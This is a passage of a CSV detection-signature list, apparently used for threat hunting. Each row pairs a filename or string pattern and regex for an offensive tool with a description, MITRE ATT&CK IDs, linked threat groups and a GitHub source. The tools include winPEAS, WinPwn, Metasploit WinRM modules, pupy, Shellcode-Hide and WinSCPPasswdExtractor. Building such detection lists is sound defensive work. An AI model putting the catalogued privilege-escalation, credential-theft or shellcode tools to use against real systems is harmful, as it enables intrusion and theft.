T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62780" "*WinhttpShellcode.vcxproj*",".{0,1000}WinhttpShellcode\.vcxproj.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","N/A","9","5","416","109","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z","62781" "*Win-Ops-Master.*",".{0,1000}Win\-Ops\-Master\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62782" "*Winpayloads*",".{0,1000}Winpayloads.{0,1000}","offensive_tool_keyword","Winpayloads","Undetectable Windows Payload Generation with extras Running on Python2.7","T1203 - T1027 - T1059","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/nccgroup/Winpayloads","1","1","N/A","N/A","N/A","10","1593","335","2022-11-08T08:14:23Z","2015-10-09T09:29:49Z","62783" "*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62784" "*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62785" "*winPEAS.bat*",".{0,1000}winPEAS\.bat.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","1","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62786" "*WinPEAS.exe*",".{0,1000}WinPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62787" "*winPEAS.exe*",".{0,1000}winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62788" "*winPEAS.Info.FilesInfo.Office.Office*",".{0,1000}winPEAS\.Info\.FilesInfo\.Office\.Office.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","62789" "*winPEAS.KnownFileCreds.Browsers.Chrome*",".{0,1000}winPEAS\.KnownFileCreds\.Browsers\.Chrome.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62790" "*winPEAS.KnownFileCreds.Browsers.Chrome*",".{0,1000}winPEAS\.KnownFileCreds\.Browsers\.Chrome.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","62791" "*winPEAS.ps1*",".{0,1000}winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62792" "*winPEAS.txt*",".{0,1000}winPEAS\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62793" "*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive 
tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62794" "*winPEASany.exe*",".{0,1000}winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62795" "*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62796" "*winPEASany_ofs.exe*",".{0,1000}winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62797" "*winPEAS-Obfuscated*",".{0,1000}winPEAS\-Obfuscated.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 
- T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62798" "*winPEASps1*",".{0,1000}winPEASps1.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62799" "*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62800" "*winPEASx64.exe*",".{0,1000}winPEASx64\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62801" "*winPEASx64_ofs.exe*",".{0,1000}winPEASx64_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - 
T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62802" "*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62803" "*winPEASx86.exe*",".{0,1000}winPEASx86\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62804" "*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","62805" "*winPEASx86_ofs.exe*",".{0,1000}winPEASx86_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - 
T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","62806" "*Win-PS2EXE.exe*",".{0,1000}Win\-PS2EXE\.exe.{0,1000}","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","N/A","10","1395","217","2025-01-05T11:26:50Z","2019-11-08T09:25:02Z","62807" "*WinPwn -*",".{0,1000}WinPwn\s\-.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62809" "*WinPwn.exe*",".{0,1000}WinPwn\.exe.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62810" "*WinPwn.ps1*",".{0,1000}WinPwn\.ps1.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation 
tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","62811" "*winpwnage.functions*",".{0,1000}winpwnage\.functions.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","62812" "*winpwnage.functions.execute.exe*",".{0,1000}winpwnage\.functions\.execute\.exe.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","62813" "*WinPwnageVPN*",".{0,1000}WinPwnageVPN.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#servicename","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","62814" 
"*winreconstreamline.bat*",".{0,1000}winreconstreamline\.bat.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","1","N/A","N/A","N/A","9","861","190","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z","62815" "*winregistry.py*",".{0,1000}winregistry\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","62816" "*WinRM already running on port 5985. 
Unexploitable!*",".{0,1000}WinRM\salready\srunning\son\sport\s5985\.\sUnexploitable!.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","62818" "*winrm_command_shell.rb*",".{0,1000}winrm_command_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62819" "*winrm_script_exec.*",".{0,1000}winrm_script_exec\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","62820" "*winrm-detection.py*",".{0,1000}winrm\-detection\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","62821" "*winrmdll *",".{0,1000}winrmdll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 
- T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","0","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","62822" "*winrmdll.*",".{0,1000}winrmdll\..{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mez-0/winrmdll","1","1","N/A","N/A","10","10","144","28","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z","62823" "*WinSCPPasswdExtractor*",".{0,1000}WinSCPPasswdExtractor.{0,1000}","offensive_tool_keyword","WinSCPPasswdExtractor","Extract WinSCP Credentials from any Windows System or winscp config file","T1003.001 - T1083 - T1145","TA0003 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/NeffIsBack/WinSCPPasswdExtractor","1","1","N/A","N/A","N/A","1","16","3","2025-03-19T15:26:16Z","2022-12-20T11:55:55Z","62828" "*WinShellcode.git*",".{0,1000}WinShellcode\.git.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tool","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","","N/A","","","","62829" "*WinShellcode-main*",".{0,1000}WinShellcode\-main.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - 
